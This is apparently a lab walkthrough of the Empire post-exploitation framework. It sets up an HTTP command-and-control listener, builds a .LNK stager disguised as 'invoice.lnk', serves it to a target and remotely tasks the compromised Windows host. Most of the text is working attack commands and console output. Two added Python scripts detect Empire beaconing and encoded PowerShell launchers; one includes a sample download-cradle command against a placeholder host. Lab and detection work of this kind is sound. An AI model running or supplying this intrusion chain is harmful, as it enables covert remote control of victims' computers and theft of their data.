Initial setup
Build a C2 server, called a listener
================================================================
[Empire] Post-Exploitation Framework
================================================================
[Version] 2.5 | [Web] https://github.com/empireProject/Empire
================================================================
_______ .___ ___. .______ __ .______ _______
| ____|| \/ | | _ \ | | | _ \ | ____|
| |__ | \ / | | |_) | | | | |_) | | |__
| __| | |\/| | | ___/ | | | / | __|
| |____ | | | | | | | | | |\ \----.| |____
|_______||__| |__| | _| |__| | _| `._____||_______|
285 modules currently loaded
0 listeners currently active
0 agents currently active
(Empire) > listeners
[!] No listeners currently active
(Empire: listeners) > uselistener http
http http_com http_foreign http_hop http_mapi
(Empire: listeners) > uselistener http
(Empire: listeners/http) > info
Name: HTTP[S]
Category: client_server
Authors:
@harmj0y
Description:
Starts a http[s] listener (PowerShell or Python) that uses a
GET/POST approach.
HTTP[S] Options:
Name Required Value Description
---- -------- ------- -----------
SlackToken False Your SlackBot API token to communicate with your Slack instance.
ProxyCreds False default Proxy credentials ([domain\]username:password) to use for request (default, none, or other).
KillDate False Date for the listener to exit (MM/dd/yyyy).
Name True http Name for the listener.
Launcher True powershell -noP -sta -w 1 -enc Launcher string.
DefaultDelay True 5 Agent delay/reach back interval (in seconds).
DefaultLostLimit True 60 Number of missed checkins before exiting
WorkingHours False Hours for the agent to operate (09:00-17:00).
SlackChannel False #general The Slack channel or DM that notifications will be sent to.
DefaultProfile True /admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Default communication profile for the agent.
Host True http://192.168.164.154:80 Hostname/IP for staging.
CertPath False Certificate path for https listeners.
DefaultJitter True 0.0 Jitter in agent reachback interval (0.0-1.0).
Proxy False default Proxy to use for request (default, none, or other).
UserAgent False default User-agent string to use for the staging request (default, none, or other).
StagingKey True x,v|hOzsE1+7r.<5YwpjgT2R[6B0inmd Staging key for initial agent negotiation.
BindIP True 0.0.0.0 The IP to bind to on the control server.
Port True 80 Port for the listener.
ServerVersion True Microsoft-IIS/7.5 Server header for the control server.
StagerURI False URI for the stager. Must use /download/. Example: /download/stager.php
(Empire: listeners/http) > set BindIP 192.168.164.154
(Empire: listeners/http) > execute
[*] Starting listener 'http'
* Serving Flask app "http" (lazy loading)
* Environment: production
WARNING: Do not use the development server in a production environment.
Use a production WSGI server instead.
* Debug mode: off
[+] Listener successfully started!
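As an added, defender-side example (not part of the original walkthrough and not Empire's own code): the DefaultProfile, DefaultDelay and DefaultJitter values in the listing above are exactly what a proxy-log check can key on. The script parses the profile string, matches constructed proxy log lines against its URIs and user-agent, and reports clients whose check-in gaps all fall inside delay*(1-jitter) .. delay*(1+jitter). The log line format, the sample lines and the hostnames in them are assumptions.

```python
import re
from datetime import datetime
from urllib.parse import urlsplit

# Listener defaults quoted from the option listing above. The profile format is
# "<uri>,<uri>,...|<user-agent>"; DefaultDelay is 5 s and DefaultJitter 0.0.
DEFAULT_PROFILE = ("/admin/get.php,/news.php,/login/process.php"
                   "|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko")
DEFAULT_DELAY, DEFAULT_JITTER = 5, 0.0

def parse_profile(profile):
    """Split an Empire profile string into (set of URI paths, user-agent)."""
    uris, _, user_agent = profile.partition("|")
    return {u.strip() for u in uris.split(",") if u.strip()}, user_agent.strip()

# Assumed proxy log format: time client method url status "user-agent".
LOG_RE = re.compile(r'^(\S+ \S+) (\S+) (\S+) (\S+) (\d{3}) "([^"]*)"$')
_UA = parse_profile(DEFAULT_PROFILE)[1]
# Constructed sample: four check-ins 5 s apart plus two unrelated requests.
SAMPLE_LOG = "\n".join(
    [f'2019-04-21 11:41:{5 * i:02d} 192.168.164.144 GET http://192.168.164.154:80'
     f'{u} 200 "{_UA}"' for i, u in enumerate(
         ["/admin/get.php", "/news.php", "/admin/get.php", "/login/process.php"])]
    + ['2019-04-21 11:41:07 192.168.164.144 GET http://intranet.example/ 200 "Mozilla/5.0 Chrome/73"',
       '2019-04-21 11:41:09 192.168.164.150 GET http://news.example/news.php 200 "curl/7.64"'])

def find_beacons(log_text, profile=DEFAULT_PROFILE, delay=DEFAULT_DELAY, jitter=DEFAULT_JITTER):
    """Report clients whose requests match the profile's URIs and user-agent, and whether
    every gap between those requests lies within delay*(1-jitter) .. delay*(1+jitter)."""
    uris, ua = parse_profile(profile)
    hits = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ts, client, _method, url, _status, agent = m.groups()
        if urlsplit(url).path in uris and agent == ua:
            hits.setdefault(client, []).append(datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"))
    lo, hi = delay * (1 - jitter), delay * (1 + jitter)
    findings = []
    for client, times in hits.items():
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        findings.append({"client": client, "requests": len(times), "gaps": gaps,
                         "regular_beacon": bool(gaps) and all(lo <= g <= hi for g in gaps)})
    return findings
```

The URI and user-agent match is the weakest part, since every option above is operator-configurable; the regular-interval test is what survives a custom profile, and a non-zero DefaultJitter only widens the accepted window.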
Creating a callback program
Create a callback program, called a stager
(Empire) > usestager
multi/bash osx/applescript osx/launcher osx/teensy windows/ducky windows/launcher_vbs windows/teensy
multi/launcher osx/application osx/macho windows/backdoorLnkMacro windows/hta windows/launcher_xml
multi/macro osx/ducky osx/macro windows/bunny windows/launcher_bat windows/macro
multi/pyinstaller osx/dylib osx/pkg windows/csharp_exe windows/launcher_lnk windows/macroless_msword
multi/war osx/jar osx/safari_launcher windows/dll windows/launcher_sct windows/shellcode
(Empire) > usestager windows/launcher_lnk
(Empire: stager/windows/launcher_lnk) > info
Name: LNKLauncher
Description:
Create a .LNK file that launches the Empire
stager.
Options:
Name Required Value Description
---- -------- ------- -----------
Listener True Listener to generate stager for.
OutFile True clickme.lnk File to output LNK to.
LNKComment False LNK Comment.
Base64 True True Switch. Base64 encode the output.
Proxy False default Proxy to use for request (default, none, or other).
ProxyCreds False default Proxy credentials ([domain\]username:password) to use for request (default, none, or other).
UserAgent False default User-agent string to use for the staging request (default, none, or other).
Icon False C:\program files\windows nt\accessories\wordpad.exe Path to LNK icon.
PowershellPath True C:\windows\system32\WindowsPowershell\v1.0\powershell.exe Path to powershell.exe
StagerRetries False 0 Times for the stager to retry connecting.
(Empire: stager/windows/launcher_lnk) > set Listener http
(Empire: stager/windows/launcher_lnk) > set OutFile invoice.lnk
(Empire: stager/windows/launcher_lnk) > execute
[*] Stager output written out to: invoice.lnk
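Added example, not from the original page and not Empire's own code: the Launcher option shown earlier (powershell -noP -sta -w 1 -enc ...) is what the generated .LNK ultimately runs, and that flag shape is what a process-creation detection should look for. The script parses PowerShell's abbreviated flags the way powershell.exe does, decodes the -EncodedCommand payload (base64 of UTF-16LE text) and classifies constructed sample command lines; CRADLE_KEYWORDS, the verdict tiers and the samples are assumptions.

```python
import base64, binascii

# Assumption: generic download-cradle indicators, not quoted from this page.
CRADLE_KEYWORDS = ("net.webclient", "downloadstring", "downloaddata", "iex", "invoke-expression")

def parse_powershell_flags(cmdline):
    """Return (launcher flags present, -EncodedCommand payload or None). powershell.exe
    accepts any unambiguous parameter prefix, so -noP/-nop/-NoProfile all count."""
    toks = cmdline.split()
    found, payload = set(), None
    for i, raw in enumerate(toks):
        tok, nxt = raw.lower(), (toks[i + 1] if i + 1 < len(toks) else "")
        if len(tok) >= 4 and "-noprofile".startswith(tok):
            found.add("noprofile")
        elif tok == "-sta":
            found.add("sta")
        elif len(tok) >= 2 and "-windowstyle".startswith(tok) and nxt.lower() in ("1", "hidden"):
            found.add("hidden")
        elif len(tok) >= 2 and "-encodedcommand".startswith(tok) and nxt:
            found.add("encoded")
            payload = nxt
    return found, payload

def decode_encoded_command(b64):
    """-EncodedCommand is base64 of UTF-16LE text; return None when it does not decode."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None

def assess(cmdline):
    """Classify one process-creation command line against the launcher shape above."""
    flags, payload = parse_powershell_flags(cmdline)
    decoded = decode_encoded_command(payload) if payload else None
    cradle = decoded is not None and any(k in decoded.lower() for k in CRADLE_KEYWORDS)
    verdict = ("launcher" if flags >= {"noprofile", "hidden", "encoded"} and cradle
               else "suspicious" if "encoded" in flags and (cradle or "hidden" in flags)
               else "benign")
    return {"flags": sorted(flags), "decoded": decoded, "cradle": cradle, "verdict": verdict}

def encode_command(script):
    """Build an -EncodedCommand value; used here only to construct the samples below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed process-creation command lines (not from the page).
SAMPLES = [
    "powershell -noP -sta -w 1 -enc " + encode_command(
        "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/x')"),
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "powershell -enc " + encode_command("Get-Date"),
]
```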
Program distribution
This time, start a simple web server, have the target download the stager from it, and let the target execute it.
root@kali:/opt/Empire# python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
192.168.164.144 - - [21/Apr/2019 11:40:05] "GET / HTTP/1.1" 200 -
192.168.164.144 - - [21/Apr/2019 11:40:07] "GET /invoice.lnk HTTP/1.1" 200 -
Remote operation
Once the callback succeeds and the agent has connected to the C2 server, you can operate the target remotely.
(Empire: stager/windows/launcher_lnk) > [*] Sending POWERSHELL stager (stage 1) to 192.168.164.144
[*] New agent K2FYZV6W checked in
[+] Initial agent K2FYZV6W from 192.168.164.144 now active (Slack)
[*] Sending agent (stage 2) to K2FYZV6W at 192.168.164.144
(Empire: stager/windows/launcher_lnk) > back
(Empire) > agents
[*] Active agents:
Name La Internal IP Machine Name Username Process PID Delay Last Seen
---- -- ----------- ------------ -------- ------- --- ----- ---------
K2FYZV6W ps 192.168.164.144 DESKTOP-1SS146L DESKTOP-1SS146L\marseil powershell 592 5/0.0 2019-04-21 11:41:45
(Empire: agents) > rename K2FYZV6W target01
(Empire: agents) > list
[*] Active agents:
Name La Internal IP Machine Name Username Process PID Delay Last Seen
---- -- ----------- ------------ -------- ------- --- ----- ---------
target01 ps 192.168.164.144 DESKTOP-1SS146L DESKTOP-1SS146L\marseil powershell 592 5/0.0 2019-04-21 11:42:10
(Empire: agents) > interact target01
(Empire: target01) > sysinfo
[*] Tasked K2FYZV6W to run TASK_SYSINFO
[*] Agent K2FYZV6W tasked with task ID 1
(Empire: target01) > sysinfo: 0|http://192.168.164.154:80|DESKTOP-1SS146L|marseille|DESKTOP-1SS146L|192.168.164.144|Microsoft Windows 10 Pro|False|powershell|592|powershell|5
[*] Agent K2FYZV6W returned results.
Listener: http://192.168.164.154:80
Internal IP: 192.168.164.144
Username: DESKTOP-1SS146L\marseille
Hostname: DESKTOP-1SS146L
OS: Microsoft Windows 10 Pro
High Integrity: 0
Process Name: powershell
Process ID: 592
Language: powershell
Language Version: 5
[*] Valid results returned by 192.168.164.144
(Empire: target01) > hostname
[*] Tasked K2FYZV6W to run TASK_SHELL
[*] Agent K2FYZV6W tasked with task ID 2
(Empire: target01) > [*] Agent K2FYZV6W returned results.
HostName Aliases AddressList
-------- ------- -----------
DESKTOP-1SS146L {} {192.168.164.144}
[*] Valid results returned by 192.168.164.144